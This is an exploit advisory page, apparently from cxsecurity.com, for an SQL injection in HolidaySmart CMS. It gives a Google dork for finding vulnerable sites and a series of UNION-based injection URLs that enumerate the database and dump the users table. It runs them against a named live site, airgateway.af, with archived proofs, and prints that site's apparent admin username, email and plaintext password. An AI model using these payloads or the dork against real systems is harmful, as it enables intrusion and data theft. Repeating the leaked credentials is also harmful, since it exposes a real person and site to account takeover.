Powered By WorldTravelGuide HolidaySmart CMS SQL Injection Vulnerability

2018.07.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Powered By WorldTravelGuide HolidaySmart CMS SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 03/07/2018 # Vendor Homepages : worldtravelguide.net ~ holidaysmart.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : inurl:''/cms.php?id='' site:af # Exploit : /cms.php?id=[SQL Inj] # Manually SQL Injection Exploit Checked [ Example Site => airgateway.af ] Here is the SQL Inj Attack Scenario => 127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,version(),3,4,5,6,7,8--%20- Information appears on the page => 5.6.39-83.1 127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(table_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.tables+where+table_schema=database()--%20- Information appears on the page => categories,client_contact,gallery,links,misc,news,news_letter,order_products,order_reply,orders,pages,product_to_categories,products,products_images,slideshow,users 127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(column_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.columns+where+table_name=0x7573657273--%20- Information appears on the page => user_id,user_name,user_email,user_pswd,user_fname,user_address,user_phone,user_dob,user_m_status,user_kids,user_pic,user_pic_status,user_city,user_country,user_create,user_last_login,user_status,user_ac_status,total_login,user_login_status 127.0.0.1/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(user_name,0x3a,user_email,0x3a,user_pswd)*/,3,4,5,6,7,8+/*!50000from*/+users--%20- Information appears on the page [ Admin username - Admin E-Mail Address - Admin Password ] => roheenkhan:roheen@airgateway.af:j414H8J3wFc ################################################################################################# # Example Site => airgateway.af/cms.php?id=-6 # [ Proof of Concepts for SQL Inj ] => airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,version(),3,4,5,6,7,8--%20- Proof => archive.is/Pr4uO airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(table_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.tables+where+table_schema=database()--%20- Proof => archive.is/FLokd airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(column_name)*/,3,4,5,6,7,8+/*!50000from*/+information_schema.columns+where+table_name=0x7573657273--%20- Proof => archive.is/8wHLE airgateway.af/cms.php?id=-6%27+/*!50000union*/+select+1,/*!50000Group_Concat(user_name,0x3a,user_email,0x3a,user_pswd)*/,3,4,5,6,7,8+/*!50000from*/+users--%20- Proof => archive.is/Shksx # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top